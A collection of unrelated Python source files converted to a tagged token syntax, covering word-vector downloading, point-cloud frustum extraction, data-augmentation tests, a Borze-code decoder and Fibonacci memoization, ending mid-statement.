# -*- coding: utf-8 -*- <import_stmt>os<import_stmt>pandas<as>pd<import_from_stmt>progressbar Bar ETA FileTransferSpeed ProgressBar Percentage RotatingMarker<import_from_stmt>six.moves.urllib.request urlretrieve<def_stmt>load_datasets path=os.path.join(os.path.dirname(__file__) 'datasets.csv')<block_start>datasets=pd.read_csv(path)<line_sep><return>datasets<block_end><def_stmt>download number=-1 name="" save_dir='./'<block_start>"""Download pre-trained word vector :param number: integer, default ``None`` :param save_dir: str, default './' :return: file path for downloaded file """<line_sep>df=load_datasets()<if_stmt>number<g>-1<block_start>row=df.iloc[[number]]<block_end><elif_stmt>name<block_start>row=df.loc[df["Name"]<eq>name]<block_end>url=''.join(row.URL)<if_stmt><not>url<block_start>print('The word vector you specified was not found. Please specify correct name.')<block_end>widgets=['Test: ' Percentage() ' ' Bar(marker=RotatingMarker()) ' ' ETA() ' ' FileTransferSpeed()]<line_sep>pbar=ProgressBar(widgets=widgets)<def_stmt>dlProgress count blockSize totalSize<block_start><if_stmt>pbar.max_value<is><none><block_start>pbar.max_value=totalSize<line_sep>pbar.start()<block_end>pbar.update(min(count<times>blockSize totalSize))<block_end>file_name=url.split('/')[-1]<if_stmt><not>os.path.exists(save_dir)<block_start>os.makedirs(save_dir)<block_end>save_path=os.path.join(save_dir file_name)<line_sep>path,_=urlretrieve(url save_path reporthook=dlProgress)<line_sep>pbar.finish()<line_sep><return>path<block_end><def_stmt>search lang=''<block_start>"""Search pre-trained word vectors by their language :param lang: str, default '' :return: None print search result as pandas DataFrame """<line_sep>df=load_datasets()<if_stmt>lang<eq>''<block_start>print(df[['Name' 'Dimension' 'Corpus' 'VocabularySize' 'Method' 'Language' 'Author']])<block_end><else_stmt><block_start>rows=df[df.Language<eq>lang]<line_sep>print(rows[['Name' 'Dimension' 'Corpus' 'VocabularySize' 'Method' 'Language' 'Author']])<block_end><block_end>
<import_from_stmt>collections Counter<import_from_stmt>datetime datetime timedelta<import_from_stmt>database connect_db<def_stmt>setup_arg_parser parser<block_start>parser.add_argument('days_ago' type=int default=0)<block_end><def_stmt>get_chat_id event<block_start><return>event.get('chat_id' event['chat']['id'])<block_end><def_stmt>main days_ago **kwargs<block_start>db=connect_db()<line_sep>day=datetime.utcnow().replace(hour=0 minute=0 second=0 microsecond=0)<for_stmt>x range(days_ago+1)<block_start>start=day-timedelta(days=x)<line_sep>end=start+timedelta(days=1)<line_sep>query={'type':'delete_msg' 'date':{'$gte':start '$lt':end } }<line_sep>del_count=0<line_sep>chat_reg=set()<for_stmt>event db.event.find(query)<block_start>del_count<augadd>1<line_sep>chat_reg.add(get_chat_id(event))<block_end>db.day_stat.find_one_and_update({'date':start} {'$set':{'delete_msg':del_count 'chat':len(chat_reg) }} upsert=<true> )<line_sep>print('Date: %s'%start)<line_sep>print(' * delete_msg: %d'%del_count)<line_sep>print(' * chat: %d'%len(chat_reg))<block_end><block_end>
# Copyright 2019-2020 The ASReview Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_from_stmt>asreview.models.deprecated _moved_warning<import_from_stmt>asreview.models.query.max MaxQuery<as>_MaxQuery<import_from_stmt>asreview.models.query.mixed MixedQuery<as>_MixedQuery<import_from_stmt>asreview.models.query.uncertainty UncertaintyQuery<as>_UncertaintyQuery<import_from_stmt>asreview.models.query.random RandomQuery<as>_RandomQuery<import_from_stmt>asreview.models.query.cluster ClusterQuery<as>_ClusterQuery<import_from_stmt>asreview.models.query.utils get_query_model<as>_get_query_model<import_from_stmt>asreview.models.query.utils get_query_class<as>_get_query_class<import_from_stmt>asreview.models.query.utils list_query_strategies<as>_list_query_strategies<line_sep>"""Deprecated, will be removed in version 1.0"""<line_sep>MaxQuery=_moved_warning(_MaxQuery "asreview.models.query.MaxQuery" "asreview.query_strategies.MaxQuery")<line_sep>MixedQuery=_moved_warning(_MixedQuery "asreview.models.query.MixedQuery" "asreview.query_strategies.MixedQuery")<line_sep>UncertaintyQuery=_moved_warning(_UncertaintyQuery "asreview.models.query.UncertaintyQuery" "asreview.query_strategies.UncertaintyQuery")<line_sep>RandomQuery=_moved_warning(_RandomQuery "asreview.models.query.RandomQuery" "asreview.query_strategies.RandomQuery")<line_sep>ClusterQuery=_moved_warning(_ClusterQuery "asreview.models.query.ClusterQuery" "asreview.query_strategies.ClusterQuery")<line_sep>get_query_model=_moved_warning(_get_query_model "asreview.models.query.get_query_model" "asreview.query_strategies.get_query_model")<line_sep>get_query_class=_moved_warning(_get_query_class "asreview.models.query.get_query_class" "asreview.query_strategies.get_query_class")<line_sep>list_query_strategies=_moved_warning(_list_query_strategies "asreview.models.query.list_query_strategies" "asreview.query_strategies.list_query_strategies")<line_sep>
''' Helper class and functions for loading SUN RGB-D objects Author: <NAME> Date: October 2017 Modified by <NAME> '''<import_stmt>os<import_stmt>sys<import_stmt>numpy<as>np<import_stmt>pickle<import_stmt>argparse<import_from_stmt>PIL Image<line_sep>BASE_DIR=os.path.dirname(os.path.abspath(__file__))<line_sep>sys.path.append(BASE_DIR)<import_stmt>sunrgbd_utils<as>utils<import_from_stmt>sunrgbd_object sunrgbd_object<import_from_stmt>sunrgbd_utils random_shift_box2d extract_pc_in_box3d<def_stmt>ravel_hash coord<block_start><assert_stmt>coord.ndim<eq>2<line_sep>coord<augsub>coord.min(0)<line_sep>coord_max=coord.max(0)+1<line_sep>keys=np.zeros(coord.shape[0] dtype=np.int64)<for_stmt>i range(coord.shape[1]-1)<block_start>keys<augadd>coord[: i]<line_sep>keys<augmul>coord_max[i+1]<block_end>keys<augadd>coord[: -1]<line_sep><return>keys<block_end><def_stmt>down_sample x voxel_size=(0.05 )<block_start><if_stmt>isinstance(voxel_size float)<block_start>voxel_size=(voxel_size )<block_end><if_stmt>len(voxel_size)<eq>1<block_start>voxel_size=voxel_size<times>3<block_end>voxel_size=np.array(voxel_size dtype=np.float32)<line_sep>voxel_index=np.floor(x/voxel_size).astype(np.int64 copy=<false>)<line_sep>hash_keys=ravel_hash(voxel_index)<line_sep>_,idx=np.unique(hash_keys return_index=<true>)<line_sep><return>idx<block_end><def_stmt>get_box3d_dim_statistics my_sunrgbd_dir idx_filename type_whitelist<block_start>dataset=sunrgbd_object(my_sunrgbd_dir)<line_sep>dimension_list=[]<line_sep>type_list=[]<line_sep>data_idx_list=[int(line.rstrip())<for>line open(idx_filename)]<for_stmt>data_idx data_idx_list<block_start>print('------------- ' data_idx)<line_sep>objects=dataset.get_label_objects(data_idx)<for_stmt>obj_idx range(len(objects))<block_start>obj=objects[obj_idx]<if_stmt>obj.classname<not><in>type_whitelist<block_start><continue><block_end>dimension_list.append(np.array([obj.l obj.w obj.h]))<line_sep>type_list.append(obj.classname)<block_end><block_end>print("number of objects: {} ".format(len(type_list)))<line_sep>print("categories:" list(sorted(type_whitelist)))<line_sep># Get average box size for different categories <for_stmt>class_type sorted(set(type_list))<block_start>cnt=0<line_sep>box3d_list=[]<for_stmt>i range(len(dimension_list))<block_start><if_stmt>type_list[i]<eq>class_type<block_start>cnt<augadd>1<line_sep>box3d_list.append(dimension_list[i])<block_end><block_end>median_box3d=np.median(box3d_list 0)<line_sep>print("\'%s\': np.array([%f,%f,%f]),"%(class_type median_box3d[0]<times>2 median_box3d[1]<times>2 median_box3d[2]<times>2))<block_end><block_end><def_stmt>read_det_file det_file<block_start>id_list=[]<line_sep>type_list=[]<line_sep>prob_list=[]<line_sep>box2d_list=[]<line_sep># data_idx, type_list, prob, box2d <with_stmt>open(det_file 'rt')<as>f<block_start><for_stmt>line f<block_start>t=line.rstrip().split(" ")<line_sep>id_list.append(int(t[0]))<line_sep>type_list.append(t[1])<line_sep>prob_list.append(float(t[2]))<line_sep>box2d_list.append(np.array([float(t[i])<for>i range(3 7)]))<block_end><block_end><return>id_list type_list box2d_list prob_list<block_end><def_stmt>read_det_pkl_file det_file<block_start>classes=['__background__' 'bathtub' 'bed' 'bookshelf' 'box' 'chair' 'counter' 'desk' 'door' 'dresser' 'garbage_bin' 'lamp' 'monitor' 'night_stand' 'pillow' 'sink' 'sofa' 'table' 'tv' 'toilet']<with_stmt>open(det_file 'rb')<as>f<block_start>dets=pickle.load(f)<block_end>num_classes=len(dets)<line_sep>num_images=len(dets[0])<line_sep>id_list=[]<line_sep>type_list=[]<line_sep>prob_list=[]<line_sep>box2d_list=[]<for_stmt>i range(num_images)<block_start><for_stmt>c range(1 num_classes)<block_start>det=dets[c][i]<for_stmt>j range(len(det))<block_start>id_list.append((i+1))<line_sep>type_list.append(classes[c])<line_sep>prob_list.append(det[j][4])<line_sep>box2d_list.append(det[j][:4])<block_end><block_end><block_end><return>id_list type_list box2d_list prob_list<block_end><def_stmt>extract_frustum_data sunrgbd_dir idx_filename split output_filename type_whitelist perturb_box2d=<false> augmentX=1 with_down_sample=<false><block_start>dataset=sunrgbd_object(sunrgbd_dir split)<line_sep>data_idx_list=[int(line.rstrip())<for>line open(idx_filename)]<line_sep>id_list=[]# int number box2d_list=[]# [xmin,ymin,xmax,ymax] box3d_list=[]# (8,3) array in upright depth coord input_list=[]# channel number = 6, xyz,rgb in upright depth coord label_list=[]# 1 for roi object, 0 for clutter type_list=[]# string e.g. bed heading_list=[]# face of object angle, radius of clockwise angle from positive x axis in upright camera coord box3d_size_list=[]# array of l,w,h frustum_angle_list=[]# angle of 2d box center from pos x-axis (clockwise) img_coord_list=[]<line_sep>calib_K_list=[]<line_sep>calib_R_list=[]<line_sep>pos_cnt=0<line_sep>all_cnt=0<for_stmt>data_idx data_idx_list<block_start>print('------------- ' data_idx)<line_sep>calib=dataset.get_calibration(data_idx)<line_sep>objects=dataset.get_label_objects(data_idx)<line_sep>pc_upright_depth=dataset.get_pointcloud(data_idx)<line_sep>pc_upright_camera=np.zeros_like(pc_upright_depth)<line_sep>pc_upright_camera[: 0:3]=calib.project_upright_depth_to_upright_camera(pc_upright_depth[: 0:3])<line_sep>pc_upright_camera[: 3:]=pc_upright_depth[: 3:]<if_stmt>with_down_sample<block_start>idx=down_sample(pc_upright_camera[: :3] 0.01)<line_sep># print(len(idx), len(pc_upright_camera)) pc_upright_camera=pc_upright_camera[idx]<line_sep>pc_upright_depth=pc_upright_depth[idx]<block_end># img = dataset.get_image(data_idx) # img_height, img_width, img_channel = img.shape pc_image_coord,_=calib.project_upright_depth_to_image(pc_upright_depth)<for_stmt>obj_idx range(len(objects))<block_start>obj=objects[obj_idx]<if_stmt>obj.classname<not><in>type_whitelist<block_start><continue><block_end># 2D BOX: Get pts rect backprojected box2d=obj.box2d<for_stmt>_ range(augmentX)<block_start><if_stmt>perturb_box2d<block_start>xmin,ymin,xmax,ymax=random_shift_box2d(box2d)<line_sep># print(xmin,ymin,xmax,ymax) <block_end><else_stmt><block_start>xmin,ymin,xmax,ymax=box2d<block_end>box_fov_inds=(pc_image_coord[: 0]<l>xmax)&(pc_image_coord[: 0]<ge>xmin)&(pc_image_coord[: 1]<l>ymax)&(pc_image_coord[: 1]<ge>ymin)<line_sep>coord_in_box_fov=pc_image_coord[box_fov_inds :]<line_sep>pc_in_box_fov=pc_upright_camera[box_fov_inds :]<line_sep># Get frustum angle (according to center pixel in 2D BOX) box2d_center=np.array([(xmin+xmax)/2.0 (ymin+ymax)/2.0])<line_sep>uvdepth=np.zeros((1 3))<line_sep>uvdepth[0 0:2]=box2d_center<line_sep>uvdepth[0 2]=20# some random depth box2d_center_upright_camera=calib.project_image_to_upright_camera(uvdepth)<line_sep># print('UVdepth, center in upright camera: ', uvdepth, box2d_center_upright_camera) frustum_angle=-1<times>np.arctan2(box2d_center_upright_camera[0 2] box2d_center_upright_camera[0 0])<line_sep># angle as to positive x-axis as in the Zoox paper # print('Frustum angle: ', frustum_angle) # 3D BOX: Get pts velo in 3d box box3d_pts_2d,box3d_pts_3d=utils.compute_box_3d(obj calib)<line_sep>box3d_pts_3d=calib.project_upright_depth_to_upright_camera(box3d_pts_3d)<try_stmt><block_start>_,inds=extract_pc_in_box3d(pc_in_box_fov box3d_pts_3d)<block_end><except_stmt>Exception<as>e<block_start>print(e)<line_sep><continue><block_end>label=np.zeros((pc_in_box_fov.shape[0]))<line_sep>label[inds]=1<line_sep>box3d_size=np.array([2<times>obj.l 2<times>obj.w 2<times>obj.h])<line_sep># Subsample points.. num_point=pc_in_box_fov.shape[0]<if_stmt>num_point<g>2048<block_start>choice=np.random.choice(pc_in_box_fov.shape[0] 2048 replace=<false>)<line_sep>coord_in_box_fov=coord_in_box_fov[choice :]<line_sep>pc_in_box_fov=pc_in_box_fov[choice :]<line_sep>label=label[choice]<block_end># Reject object with too few points <if_stmt>np.sum(label)<l>5<block_start><continue><block_end>id_list.append(data_idx)<line_sep>box2d_list.append(np.array([xmin ymin xmax ymax] dtype=np.float32))<line_sep>box3d_list.append(box3d_pts_3d)<line_sep>input_list.append(pc_in_box_fov.astype(np.float32))<line_sep>label_list.append(label.astype(np.bool))<line_sep>type_list.append(obj.classname)<line_sep>heading_list.append(obj.heading_angle)<line_sep>box3d_size_list.append(box3d_size)<line_sep>frustum_angle_list.append(frustum_angle)<line_sep>img_coord_list.append(coord_in_box_fov.astype(np.float32))<line_sep>calib_K_list.append(calib.K)<line_sep>calib_R_list.append(calib.Rtilt)<line_sep># collect statistics pos_cnt<augadd>np.sum(label)<line_sep>all_cnt<augadd>pc_in_box_fov.shape[0]<block_end><block_end><block_end>print('Average pos ratio: ' pos_cnt/float(all_cnt))<line_sep>print('Average npoints: ' float(all_cnt)/len(id_list))<line_sep>data_dict={'id':id_list 'box2d':box2d_list 'box3d':box3d_list 'box3d_size':box3d_size_list 'box3d_heading':heading_list 'type':type_list 'input':input_list 'frustum_angle':frustum_angle_list 'label':label_list 'calib_K':calib_K_list 'calib_R':calib_R_list # 'image_coord': img_coord_list, }<with_stmt>open(output_filename 'wb')<as>f<block_start>pickle.dump(data_dict f -1)<block_end>print("save in {}".format(output_filename))<block_end><def_stmt>extract_frustum_data_from_rgb_detection sunrgbd_dir det_file split output_filename type_whitelist valid_id_list=<none> with_down_sample=<false><block_start>dataset=sunrgbd_object(sunrgbd_dir split)<if_stmt>det_file.split('.')[-1]<eq>'txt'<block_start>det_id_list,det_type_list,det_box2d_list,det_prob_list=read_det_file(det_file)<block_end><else_stmt><block_start>det_id_list,det_type_list,det_box2d_list,det_prob_list=read_det_pkl_file(det_file)<block_end>cache_id=-1<line_sep>cache=<none><line_sep>id_list=[]<line_sep>type_list=[]<line_sep>box2d_list=[]<line_sep>prob_list=[]<line_sep>input_list=[]# channel number = 4, xyz,intensity in rect camera coord frustum_angle_list=[]# angle of 2d box center from pos x-axis img_coord_list=[]<line_sep>calib_K_list=[]<line_sep>calib_R_list=[]<for_stmt>det_idx range(len(det_id_list))<block_start>data_idx=det_id_list[det_idx]<if_stmt>valid_id_list<is><not><none><and>data_idx<not><in>valid_id_list<block_start><continue><block_end><if_stmt>det_type_list[det_idx]<not><in>type_whitelist<block_start><continue><block_end>print('det idx: %d/%d, data idx: %d'%(det_idx len(det_id_list) data_idx))<if_stmt>cache_id<ne>data_idx<block_start>calib=dataset.get_calibration(data_idx)<line_sep>pc_upright_depth=dataset.get_pointcloud(data_idx)<line_sep>pc_upright_camera=np.zeros_like(pc_upright_depth)<line_sep>pc_upright_camera[: 0:3]=calib.project_upright_depth_to_upright_camera(pc_upright_depth[: 0:3])<line_sep>pc_upright_camera[: 3:]=pc_upright_depth[: 3:]<if_stmt>with_down_sample<block_start>idx=down_sample(pc_upright_camera[: :3] 0.01)<line_sep># print(len(idx), len(pc_upright_camera)) pc_upright_camera=pc_upright_camera[idx]<line_sep>pc_upright_depth=pc_upright_depth[idx]<block_end># img = dataset.get_image(data_idx) # img_height, img_width, img_channel = img.shape pc_image_coord,_=calib.project_upright_depth_to_image(pc_upright_depth)<line_sep>cache=[calib pc_upright_camera pc_image_coord]<line_sep>cache_id=data_idx<block_end><else_stmt><block_start>calib,pc_upright_camera,pc_image_coord=cache<block_end># 2D BOX: Get pts rect backprojected xmin,ymin,xmax,ymax=det_box2d_list[det_idx]<line_sep>box_fov_inds=(pc_image_coord[: 0]<l>xmax)&(pc_image_coord[: 0]<ge>xmin)&(pc_image_coord[: 1]<l>ymax)&(pc_image_coord[: 1]<ge>ymin)<line_sep>coord_in_box_fov=pc_image_coord[box_fov_inds :]<line_sep>pc_in_box_fov=pc_upright_camera[box_fov_inds :]<line_sep># Get frustum angle (according to center pixel in 2D BOX) box2d_center=np.array([(xmin+xmax)/2.0 (ymin+ymax)/2.0])<line_sep>uvdepth=np.zeros((1 3))<line_sep>uvdepth[0 0:2]=box2d_center<line_sep>uvdepth[0 2]=20# some random depth box2d_center_upright_camera=calib.project_image_to_upright_camera(uvdepth)<line_sep>frustum_angle=-1<times>np.arctan2(box2d_center_upright_camera[0 2] box2d_center_upright_camera[0 0])<line_sep># angle as to positive x-axis as in the Zoox paper # Subsample points.. num_point=pc_in_box_fov.shape[0]<if_stmt>num_point<g>2048<block_start>choice=np.random.choice(pc_in_box_fov.shape[0] 2048 replace=<false>)<line_sep>coord_in_box_fov=coord_in_box_fov[choice :]<line_sep>pc_in_box_fov=pc_in_box_fov[choice :]<block_end># Pass objects that are too small <if_stmt>len(pc_in_box_fov)<l>5<block_start><continue><block_end>id_list.append(data_idx)<line_sep>type_list.append(det_type_list[det_idx])<line_sep>box2d_list.append(det_box2d_list[det_idx])<line_sep>prob_list.append(det_prob_list[det_idx])<line_sep>input_list.append(pc_in_box_fov.astype(np.float32))<line_sep>frustum_angle_list.append(frustum_angle)<line_sep>img_coord_list.append(coord_in_box_fov.astype(np.float32))<line_sep>calib_K_list.append(calib.K)<line_sep>calib_R_list.append(calib.Rtilt)<block_end>data_dict={'id':id_list 'type':type_list 'box2d':box2d_list 'box2d_prob':prob_list 'input':input_list 'frustum_angle':frustum_angle_list 'calib_K':calib_K_list 'calib_R':calib_R_list # 'image_coord': img_coord_list, }<with_stmt>open(output_filename 'wb')<as>f<block_start>pickle.dump(data_dict f -1)<block_end>print("save in {}".format(output_filename))<block_end><if_stmt>__name__<eq>'__main__'<block_start>parser=argparse.ArgumentParser()<line_sep>parser.add_argument('--gen_train' action='store_true' help='Generate train split frustum data with perturbed GT 2D boxes')<line_sep>parser.add_argument('--gen_val' action='store_true' help='Generate val split frustum data with GT 2D boxes')<line_sep>parser.add_argument('--gen_val_rgb_detection' action='store_true' help='Generate val split frustum data with RGB detection 2D boxes')<line_sep>parser.add_argument('--num_classes' default=10 type=int help='19 or 10 categories, default 10')<line_sep>parser.add_argument('--save_dir' default='sunrgbd/data/pickle_data' type=str help='directory to save data, default[sunrgbd/data/pickle_data]')<line_sep>parser.add_argument('--gen_avg_dim' action='store_true' help='get average dimension of each class')<line_sep>args=parser.parse_args()<line_sep>my_sunrgbd_dir='sunrgbd/mysunrgbd'# change if you do not set default path <if_stmt>args.num_classes<eq>10<block_start>type_whitelist=['bed' 'table' 'sofa' 'chair' 'toilet' 'desk' 'dresser' 'night_stand' 'bookshelf' 'bathtub']<block_end><elif_stmt>args.num_classes<eq>19<block_start>type_whitelist=['bathtub' 'bed' 'bookshelf' 'box' 'chair' 'counter' 'desk' 'door' 'dresser' 'garbage_bin' 'lamp' 'monitor' 'night_stand' 'pillow' 'sink' 'sofa' 'table' 'tv' 'toilet']<block_end><else_stmt><block_start><assert_stmt><false> 'please set correct num_classes'<block_end>type_whitelist=set(type_whitelist)<if_stmt>args.gen_avg_dim<block_start>get_box3d_dim_statistics(my_sunrgbd_dir 'sunrgbd/image_sets/train.txt' type_whitelist)<block_end>save_dir=args.save_dir<if_stmt><not>os.path.exists(save_dir)<block_start>os.makedirs(save_dir)<block_end><if_stmt>args.gen_train<block_start>extract_frustum_data(my_sunrgbd_dir 'sunrgbd/image_sets/train.txt' 'training' output_filename=os.path.join(save_dir 'sunrgbd_train_aug5x.pickle') type_whitelist=type_whitelist perturb_box2d=<true> augmentX=5 with_down_sample=<false>)<block_end><if_stmt>args.gen_val<block_start>extract_frustum_data(my_sunrgbd_dir 'sunrgbd/image_sets/val.txt' 'training' output_filename=os.path.join(save_dir 'sunrgbd_val.pickle') type_whitelist=type_whitelist perturb_box2d=<false> augmentX=1 with_down_sample=<false>)<block_end><if_stmt>args.gen_val_rgb_detection<block_start>extract_frustum_data_from_rgb_detection(my_sunrgbd_dir './sunrgbd/rgb_detections/sunrgbd_rgb_det_val_classes19_mAP50.2.txt' 'training' os.path.join(save_dir 'sunrgbd_rgb_det_val.pickle') type_whitelist=type_whitelist)<block_end><block_end>
<import_from_stmt>program_synthesis.karel.dataset executor<import_from_stmt>program_synthesis.karel.dataset parser_for_synthesis<line_sep>branch_types={'if' 'ifElse' 'while'}<line_sep>stmt_types={'move' 'turnLeft' 'turnRight' 'putMarker' 'pickMarker'}<class_stmt>CoverageMeasurer(object)<block_start><def_stmt>__init__ self code<block_start>self.parser=parser_for_synthesis.KarelForSynthesisParser(build_tree=<true>)<line_sep>self.executor=executor.KarelExecutor()<line_sep>self.code=code<line_sep>tree=self.parser.parse(code)<line_sep># Statement coverage: actions self.stmt_coverage={span:0<for>span self.parser.action_spans}<line_sep># Branch coverage: if, ifelse, while self.branch_coverage={(span cond_value):0<for>span self.parser.cond_block_spans<for>cond_value (<true> <false>)}<block_end><def_stmt>add self inp<block_start>out,trace=self.executor.execute(self.code <none> inp record_trace=<true>)<if_stmt><not>out<block_start><return><false><block_end><for_stmt>event trace.events<block_start><if_stmt>event.type<in>branch_types<block_start>self.branch_coverage[event.span event.cond_value]<augadd>1<block_end><elif_stmt>event.type<in>stmt_types<block_start>self.stmt_coverage[event.span]<augadd>1<block_end><block_end><return><true><block_end><def_stmt>uncovered self<block_start><return>(tuple(k<for>k,v self.stmt_coverage.iteritems()<if>v<eq>0) tuple(k<for>k,v self.branch_coverage.iteritems()<if>v<eq>0))<block_end><block_end>
<import_stmt>unittest<import_stmt>os<import_stmt>torch<import_from_stmt>dotenv load_dotenv<import_stmt>nlpaug.augmenter.word<as>naw<import_stmt>nlpaug.model.lang_models<as>nml<class_stmt>TestBackTranslationAug(unittest.TestCase)<block_start>@classmethod<def_stmt>setUpClass cls<block_start>env_config_path=os.path.abspath(os.path.join(os.path.dirname(__file__) '..' '..' '..' '.env'))<line_sep>load_dotenv(env_config_path)<line_sep>cls.text='The quick brown fox jumps over the lazy dog'<line_sep>cls.texts=['The quick brown fox jumps over the lazy dog' "Seeing all of the negative reviews for this movie, I figured that it could be yet another comic masterpiece that wasn't quite meant to be."]<line_sep>cls.eng_model_names=[{'from_model_name':'facebook/wmt19-en-de' 'to_model_name':'facebook/wmt19-de-en' }]<block_end><def_stmt>sample_test_case self device# From English <block_start><for_stmt>model_name self.eng_model_names<block_start>aug=naw.BackTranslationAug(from_model_name=model_name['from_model_name'] to_model_name=model_name['to_model_name'] device=device)<line_sep>augmented_text=aug.augment(self.text)<line_sep>aug.clear_cache()<line_sep>self.assertNotEqual(self.text augmented_text)<line_sep>augmented_texts=aug.augment(self.texts)<line_sep>aug.clear_cache()<for_stmt>d,a zip(self.texts augmented_texts)<block_start>self.assertNotEqual(d a)<block_end><if_stmt>device<eq>'cpu'<block_start>self.assertTrue(device<eq>aug.model.get_device())<block_end><elif_stmt>'cuda'<in>device<block_start>self.assertTrue('cuda'<in>aug.model.get_device())<block_end><block_end><block_end><def_stmt>test_back_translation self<block_start><if_stmt>torch.cuda.is_available()<block_start>self.sample_test_case('cuda')<block_end>self.sample_test_case('cpu')<block_end><def_stmt>test_batch_size self<block_start>model_name=self.eng_model_names[0]<line_sep># 1 per batch aug=naw.BackTranslationAug(from_model_name=model_name['from_model_name'] to_model_name=model_name['to_model_name'] batch_size=1)<line_sep>aug_data=aug.augment(self.texts)<line_sep>self.assertEqual(len(aug_data) len(self.texts))<line_sep># batch size = input size aug=naw.BackTranslationAug(from_model_name=model_name['from_model_name'] to_model_name=model_name['to_model_name'] batch_size=len(self.texts))<line_sep>aug_data=aug.augment(self.texts)<line_sep>self.assertEqual(len(aug_data) len(self.texts))<line_sep># batch size > input size aug=naw.BackTranslationAug(from_model_name=model_name['from_model_name'] to_model_name=model_name['to_model_name'] batch_size=len(self.texts)+1)<line_sep>aug_data=aug.augment(self.texts)<line_sep>self.assertEqual(len(aug_data) len(self.texts))<line_sep># input size > batch size aug=naw.BackTranslationAug(from_model_name=model_name['from_model_name'] to_model_name=model_name['to_model_name'] batch_size=2)<line_sep>aug_data=aug.augment(self.texts<times>2)<line_sep>self.assertEqual(len(aug_data) len(self.texts)<times>2)<block_end><block_end>
<import_stmt>os<import_stmt>re<import_stmt>sys<import_stmt>cffi<import_from_stmt>._compat PY2<line_sep>_directive_re=re.compile(r'^\s*#.*?$(?m)')<def_stmt>make_ffi module_path crate_path cached_header_filename=<none><block_start>"""Creates a FFI instance for the given configuration."""<if_stmt>cached_header_filename<is><not><none><and>os.path.isfile(cached_header_filename)<block_start><with_stmt>open(cached_header_filename 'rb')<as>f<block_start>header=f.read()<block_end><if_stmt><not>PY2<block_start>header=header.decode('utf-8')<block_end><block_end><else_stmt><block_start><import_from_stmt>.bindgen generate_header<line_sep>header=generate_header(crate_path)<block_end>header=_directive_re.sub('' header)<if_stmt>os.environ.get('SNAEK_DEBUG_HEADER')<eq>'1'<block_start>sys.stderr.write('/* generated header for "%s" */\n'%module_path)<line_sep>sys.stderr.write(header)<line_sep>sys.stderr.write('\n')<line_sep>sys.stderr.flush()<block_end>ffi=cffi.FFI()<line_sep>ffi.cdef(header)<line_sep>ffi.set_source(module_path <none>)<line_sep><return>ffi<block_end>
<import_from_future_stmt> absolute_import<import_from_stmt>.numpy_wrapper *<import_from_stmt>. numpy_boxes<import_from_stmt>. numpy_vspaces<import_from_stmt>. numpy_vjps<import_from_stmt>. numpy_jvps<import_from_stmt>. linalg<import_from_stmt>. fft<import_from_stmt>. random<line_sep>
<import_stmt>os<import_from_stmt>unittest TestCase<import_from_stmt>keras_gpt_2 get_bpe_from_files<class_stmt>TestBPE(TestCase)<block_start><def_stmt>test_encode_and_decode self<block_start>current_path=os.path.dirname(os.path.abspath(__file__))<line_sep>toy_checkpoint_path=os.path.join(current_path 'toy_checkpoint')<line_sep>encoder_path=os.path.join(toy_checkpoint_path 'encoder.json')<line_sep>vocab_path=os.path.join(toy_checkpoint_path 'vocab.bpe')<line_sep>bpe=get_bpe_from_files(encoder_path vocab_path)<line_sep>text='Power, give me more power!'<line_sep>indices=bpe.encode(text)<line_sep>self.assertEqual([13434 11 1577 502 517 1176 0] indices)<line_sep>self.assertEqual(text bpe.decode(indices))<line_sep>self.assertEqual(text bpe.decode(bpe.encode(text)))<block_end><block_end>
# Ternary numeric notation is quite popular in Berland. To telegraph the ternary number the Borze alphabet is used. Digit 0 is transmitted as «.», 1 as «-.» and 2 as «--». You are to decode the Borze code, i.e. to find out the ternary number given its representation in Borze alphabet. # Input # The first line contains a number in Borze code. The length of the string is between 1 and 200 characters. It's guaranteed that the given string is a valid Borze code of some ternary number (this number can have leading zeroes). # Output # Output the decoded ternary number. It can have leading zeroes. # input # .-.-- # output # 012 # input # --. # output # 20 # input # -..-.-- # output # 1012 s=input()#input the string size=len(s)# it calculate the size of the input string i=0# pointed at starting of the string j=i+1<line_sep>string=""#empty string <while_stmt>j<l>len(s)# this loop works till j == size of the input string(s) <block_start><if_stmt>s[i]<eq>"."<block_start>string<augadd>"0"<line_sep>i=j<line_sep>j=i+1<block_end><elif_stmt>s[i]<eq>"-"<and>s[j]<eq>"."<block_start>string<augadd>"1"<line_sep>i=j+1<line_sep>j=i+1<block_end><elif_stmt>s[i]<eq>"-"<and>s[j]<eq>"-"<block_start>string<augadd>"2"<line_sep>i=j+1<line_sep>j=i+1<block_end><block_end><while_stmt>i<l>len(s)<block_start><if_stmt>s[i]<eq>"."<block_start>string<augadd>"0"<block_end>i<augadd>1<block_end>print(string)<line_sep>
# source: http://oeis.org/A000045 fibo_seq=[0 1 1 2 3 5 8 13 21 34 55 89 144 233 377 610 987 1597 2584 4181 6765 10946 17711 28657 46368 75025 121393 196418 317811 514229 832040 1346269 2178309 3524578 5702887 9227465 14930352 24157817 39088169]<import_from_stmt>functools lru_cache<def_stmt>fibonacci n<block_start><if_stmt>n<l>2<block_start><return>n<block_end><return>fibonacci(n-2)+fibonacci(n-1)<block_end>@lru_cache()<def_stmt>fibonacci2 n<block_start><if_stmt>n<l>2<block_start><return>n<block_end><return>fibonacci2(n-2)+fibonacci2(n-1)<block_end><def_stmt>memoize func<block_start>'''simplest memoizing decorator'''<line_sep>cache={}<def_stmt>memoized *args<block_start><if_stmt>args<not><in>cache<block_start>cache[args]=func(*args)<block_end><return>cache[args]<block_end><return>memoized<block_end><def_stmt>test <block_start><for_stmt>i,expected enumerate(fibo_seq[:31])<block_start>print(i expected)<assert_stmt>fibonacci(i)<eq>expected<block_end><block_end><def_stmt>chronograph <block_start><global>fibonacci<import_from_stmt>time time<line_sep>t0=time()<line_sep>n=32<line_sep>res=fibonacci(n)<line_sep>#res = [fibonacci(n) for n in range(30)] t1=time()<line_sep>print(n res format(t1-t0 '0.6f'))<line_sep>t0=time()<line_sep>res=fibonacci2(n)<line_sep>#res = [fibonacci2(n) for n in range(30)] t1=time()<line_sep>print(n res format(t1-t0 '0.6f'))<line_sep>t0=time()<line_sep>fibonacci=memoize(fibonacci)<line_sep>res=fibonacci(n)<line_sep>#res = [fibonacci2(n) for n in range(30)] t1=time()<line_sep>print(n res 